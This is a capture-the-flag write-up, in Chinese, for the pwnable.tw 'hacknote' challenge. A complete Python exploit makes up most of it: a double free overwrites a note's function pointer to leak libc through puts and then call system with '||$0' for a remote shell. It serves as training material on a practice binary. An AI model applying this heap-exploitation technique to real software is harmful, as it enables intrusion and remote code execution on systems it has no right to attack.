pwnable.tw-hacknote


大体思路

又是一道基本的堆题,一开始想double free,一直在想在哪里可以构造一个fake chunk。然后感觉也不好leak。

后来发现每个note的ptr[0]是一个函数,可以通过double free来控制ptr[0],改成puts就能leak出libc_base。之后改成system。

但是它的调用是ptr[0](ptr[0]),于是搜索了一番以后发现可以system(“asdfsadf||/bin/sh”)。但是每个头都只有8个bytes,放“||/bin/sh”又放不下,于是用到了之前做bugku的时候发现的冷知识:$0。

最后改成system(“system_addr||$0”)就可以getshell。

对堆的利用我就放一张之前打的草稿好了。但是画得很乱,可以试着看一看。

第一个note分配大一些,在后面连续分配两次note的时候能控制chunk 1

exp

from PwnContext import *
from libnum import *

try:
    from IPython import embed as ipy
except ImportError:
    # IPython is optional: when it is missing only this notice is printed and
    # the script carries on (`ipy` is not referenced anywhere in this listing).
    print ('IPython not installed.')

def add(size, content):
    """Menu option 1: create a note of `size` bytes holding `content`.

    Answers the program's three ':' prompts in order (option, size, content)
    through the module-level `sla` helper bound under __main__.
    """
    for reply in ('1', str(size), content):
        sla(':', reply)

def free(index):
    """Menu option 2: delete the note at `index`.

    The write-up's double free (free 1, free 0, free 1 in the main block)
    goes through this menu entry.
    """
    for reply in ('2', str(index)):
        sla(':', reply)

def dump(index):
    """Menu option 3: print the note at `index`.

    Per the write-up the program calls the note's stored function pointer as
    ptr[0](ptr[0]) here, so this is also what fires an overwritten pointer.
    """
    for reply in ('3', str(index)):
        sla(':', reply)

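if __name__ == '__main__':
    # Exploit driver for the hacknote challenge described in the write-up above.
    # A double free on the note list (the bug class a delete handler avoids by
    # clearing the freed note's slot) lets a later allocation overwrite a note's
    # function pointer: first to leak puts@libc, then to call system().  The
    # helpers add/free/dump (defined above) drive the menu via `sla`, bound below.
    # context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
    context.log_level = 'debug'  # log every byte sent/received while developing
    # functions for quick script: thin wrappers over the PwnContext tube `ctx`.
    # Only sla, ru, rs and irt are used in this script; the rest are kept from
    # the template (dbg() is the commented-out debugger hook near the end).
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
    sl      = lambda data               :ctx.sendline(str(data))
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions: unpack a short leak by NUL-padding it to 4/8 bytes
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
    # Target configuration consumed by PwnContext: local binary, remote
    # endpoint, and the libc shipped with the challenge.
    ctx.binary = './hacknote'
    ctx.remote = ('chall.pwnable.tw', 10102)
    ctx.remote_libc = './libc.so.6'
    ctx.debug_remote_libc = True
    # rs()
    rs('remote')  # talk to the remote service; the bare rs() above runs the local binary
    print(ctx.libc.path)
    # Stage 1 -- heap layout.  Per the write-up, note 0 gets a larger content
    # chunk (0x10) than note 1 (0x8) so that the two 0x8 allocations made after
    # the frees land on note 1's chunks.
    add(0x10,'a'*0x10)  # 0
    add(0x8,'b'*0x8)  # 1
    # The double free of note 1 (free 1, free 0, free 1) is the bug being exploited.
    free(1)
    free(0)
    free(1)
    # Stage 2 -- leak.  The second allocation below refills note 1's header:
    # the first dword is the new function pointer (0x804862B, an address inside
    # the binary -- the write-up describes it as the puts call; confirm against
    # the disassembly) and the second is puts@GOT, so printing note 1 echoes the
    # resolved address of puts.
    add(0x8,'d'*8)  # 0
    add(0x8,p32(0x804862B)+p32(ctx.binary.got['puts']))  # 1
    dump(1)
    ru('Index :')
    puts = u32(ru(' ')[:4])  # 32-bit target: the first 4 echoed bytes are the pointer
    libc_base = puts - ctx.libc.symbols['puts']
    print('libc_base: '+hex(libc_base))
    system = libc_base + ctx.libc.symbols['system']
    # Stage 3 -- point the function pointer at system.  Because the program
    # calls ptr[0](ptr[0]) (see write-up), the 8-byte header doubles as the
    # command string; '||$0' is the write-up's trick for fitting one into it.
    # NOTE(review): p32(...) + '||$0' concatenates packed bytes with a str, which
    # only works where p32 returns str (Python 2 pwntools) -- confirm the interpreter.
    free(0)
    add(0x8,p32(system)+'||$0')
    dump(1)
    # dbg()
    irt()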

附:

最近在搜怎么替换指定libc的时候发现了一个很牛逼的framework——welpwn,用了一下以后感觉非常易用
